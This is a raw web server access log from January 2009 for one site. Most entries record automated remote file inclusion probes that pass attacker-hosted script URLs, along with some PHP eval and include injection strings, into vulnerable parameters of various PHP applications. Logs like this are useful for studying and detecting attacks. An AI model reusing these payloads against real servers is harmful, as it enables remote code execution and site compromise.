193.25.112.69 - - [06/Jan/2009:09:20:27 -0800] "GET /logs/access_080213.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://harasyeen.webs.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
86.109.170.176 - - [06/Jan/2009:09:20:29 -0800] "GET /logs/access_080710.log/index.php?sayfahttp://turkglob.tu.funpic.org/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.170.176 - - [06/Jan/2009:09:20:29 -0800] "GET /logs/access_080710.log/index.php?sayfahttp://turkglob.tu.funpic.org/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:20:40 -0800] "GET /logs/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:20:40 -0800] "GET /logs/access_081015.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:20:40 -0800] "GET /index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:20:41 -0800] "GET /logs/access_081015.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:20:41 -0800] "GET /index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:20:41 -0800] "GET /logs/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:20:41 -0800] "GET /logs/access_081005.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:20:49 -0800] "GET /logs/access_081005.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:21:44 -0800] "GET /logs/access_080723.log/vwar//includes/functions_install.php?vwar_root=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:21:45 -0800] "GET /logs/access_080504.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
202.58.16.16 - - [06/Jan/2009:09:21:48 -0800] "GET /modules/My_eGallery/index.php?basepath=http://fwt.txdnl.com/4-10/r/o/robi22//t.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
202.58.16.16 - - [06/Jan/2009:09:21:48 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://fwt.txdnl.com/4-10/r/o/robi22//t.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
193.41.90.11 - - [06/Jan/2009:09:21:50 -0800] "GET /logs/access_081114.log//components/com_joomlaboard/file_upload.php?sbp=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
193.41.90.11 - - [06/Jan/2009:09:21:50 -0800] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
193.41.90.11 - - [06/Jan/2009:09:21:50 -0800] "GET /logs//components/com_joomlaboard/file_upload.php?sbp=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:21:53 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
65.98.89.90 - - [06/Jan/2009:09:22:21 -0800] "GET /logs/access_081103.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.rolandmatthews.org/gen/id.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.89.90 - - [06/Jan/2009:09:22:22 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.rolandmatthews.org/gen/id.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.89.90 - - [06/Jan/2009:09:22:22 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.rolandmatthews.org/gen/id.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:22:36 -0800] "GET /logs/access.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:22:37 -0800] "GET /logs/access_080119.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:09:22:53 -0800] "GET /logs/access_080421.log//?path%5Bdocroot%5D=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
200.234.200.132 - - [06/Jan/2009:09:22:56 -0800] "GET /logs/access_080421.log//?path%5Bdocroot%5D=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:09:22:58 -0800] "GET /includes/settings.inc.php?include_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:09:22:58 -0800] "GET /logs//includes/settings.inc.php?include_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.174.114 - - [06/Jan/2009:09:22:58 -0800] "GET /logs/access_080901.log%20%20//includes/settings.inc.php?include_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:09:23:05 -0800] "GET /logs/access_081127.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:09:23:05 -0800] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:09:23:06 -0800] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 200 95259 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:23:08 -0800] "GET /logs/access_080412.log/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:23:09 -0800] "GET /logs/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 200 81172 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:23:10 -0800] "GET /?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 200 94763 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:23:13 -0800] "GET /logs/access_080831.log/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.11.17.16 - - [06/Jan/2009:09:23:23 -0800] "GET /logs//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.11.17.16 - - [06/Jan/2009:09:23:24 -0800] "GET /logs/access_080913.log//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:23:24 -0800] "GET /logs/access_080412.log/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:23:24 -0800] "GET /logs/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 200 81172 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:23:24 -0800] "GET /?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 200 94747 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.160.145 - - [06/Jan/2009:09:23:28 -0800] "GET /logs/access_080831.log/?sourcedir=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:09:23:32 -0800] "GET /logs/access_080917.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:09:23:36 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:09:23:36 -0800] "GET /logs/access_080906.log//components/com_flyspray/startdown.php?file=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:09:23:36 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.17.16 - - [06/Jan/2009:09:23:44 -0800] "GET /logs//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.11.17.16 - - [06/Jan/2009:09:23:44 -0800] "GET /logs/access_080913.log//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:23:56 -0800] "GET /logs/access_080504.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
218.234.23.56 - - [06/Jan/2009:09:24:01 -0800] "GET /logs/access_080831.log//components/com_flyspray/startdown.php?file=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:24:07 -0800] "GET /logs/access_081207.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:24:08 -0800] "GET /modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:24:09 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:24:22 -0800] "GET /logs/access_081015.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:24:23 -0800] "GET /index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:24:23 -0800] "GET /logs/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:24:29 -0800] "GET /logs/access_081015.log/template.php?goto=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:24:29 -0800] "GET /template.php?goto=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:24:29 -0800] "GET /logs/access_081005.log/template.php?goto=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:24:31 -0800] "GET /logs/template.php?goto=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
204.11.17.16 - - [06/Jan/2009:09:24:31 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.11.17.16 - - [06/Jan/2009:09:24:31 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:24:35 -0800] "GET /logs/access_081005.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
204.11.17.16 - - [06/Jan/2009:09:24:39 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.11.17.16 - - [06/Jan/2009:09:24:39 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:24:46 -0800] "GET /logs/access.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:24:55 -0800] "GET /logs/access_080126.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.37.54 - - [06/Jan/2009:09:25:11 -0800] "GET /logs/access_080523.log//ashnews.php?pathtoashnews=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:25:19 -0800] "GET /logs/access_080513.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.8 - - [06/Jan/2009:09:25:20 -0800] "GET /logs/access_080530.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://business-buket.ru/img/jr/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.8 - - [06/Jan/2009:09:25:20 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://business-buket.ru/img/jr/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:25:20 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.8 - - [06/Jan/2009:09:25:20 -0800] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://business-buket.ru/img/jr/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:25:20 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
113.30.66.5 - - [06/Jan/2009:09:25:20 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [06/Jan/2009:09:25:21 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:25:21 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.8 - - [06/Jan/2009:09:25:23 -0800] "GET /logs/access_080530.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://juninhor0x2009.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.8 - - [06/Jan/2009:09:25:23 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://juninhor0x2009.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.8 - - [06/Jan/2009:09:25:23 -0800] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://juninhor0x2009.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:25:24 -0800] "GET /logs/access_080513.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:09:25:25 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:09:25:25 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [06/Jan/2009:09:25:25 -0800] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:25:25 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.254.35.166 - - [06/Jan/2009:09:25:26 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.csjh.tpc.edu.tw/~sw/board/idm1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
113.30.66.5 - - [06/Jan/2009:09:25:32 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [06/Jan/2009:09:25:32 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://devil.kaizo.pochta.ru/xml/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.141.37.54 - - [06/Jan/2009:09:25:33 -0800] "GET /logs/access_080503.log//ashnews.php?pathtoashnews=http://h1.ripway.com/h4r4zuku/responz/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.18.151.242 - - [06/Jan/2009:09:25:33 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.8 - - [06/Jan/2009:09:25:39 -0800] "GET /logs/access_080520.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://juninhor0x2009.t35.com/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.8 - - [06/Jan/2009:09:25:39 -0800] "GET /logs/access_080520.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://business-buket.ru/img/jr/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.71.160.27 - - [06/Jan/2009:09:25:44 -0800] "GET /logs/access_080311.log//modules/My_eGallery/index.php?basepath=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.226.166.122 - - [06/Jan/2009:09:25:47 -0800] "GET /logs/access_080715.log//modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.inzerce-bazar.eu/foto-inzerce-bazar/pras/redm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.206.86.104 - - [06/Jan/2009:09:25:53 -0800] "GET /logs/access_080119.log/index2.php?showpage=http://www.great21.co.kr/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
132.247.8.18 - - [06/Jan/2009:09:25:56 -0800] "GET /logs/access_080927.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
132.247.8.18 - - [06/Jan/2009:09:26:00 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
132.247.8.18 - - [06/Jan/2009:09:26:01 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.50.210.69 - - [06/Jan/2009:09:26:15 -0800] "GET /logs/access_080901.log//includes/settings.inc.php?include_path=-DSSL? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.50.210.69 - - [06/Jan/2009:09:26:15 -0800] "GET /includes/settings.inc.php?include_path=-DSSL? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.50.210.69 - - [06/Jan/2009:09:26:15 -0800] "GET /logs//includes/settings.inc.php?include_path=-DSSL? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.104.169 - - [06/Jan/2009:09:26:21 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.104.169 - - [06/Jan/2009:09:26:24 -0800] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/ HTTP/1.1" 200 9451 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
148.245.102.115 - - [06/Jan/2009:09:26:25 -0800] "GET /logs/access_080518.log//include/bbs.lib.inc.php?site_path=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:26:44 -0800] "GET /logs/access_071116.log//main.php?p=http://h1.ripway.com/budi212/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:26:44 -0800] "GET /main.php?p=http://h1.ripway.com/budi212/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:26:44 -0800] "GET /logs//main.php?p=http://h1.ripway.com/budi212/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
207.182.137.218 - - [06/Jan/2009:09:26:47 -0800] "GET /logs/access_080213.log//main.php?p=http://h1.ripway.com/budi212/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
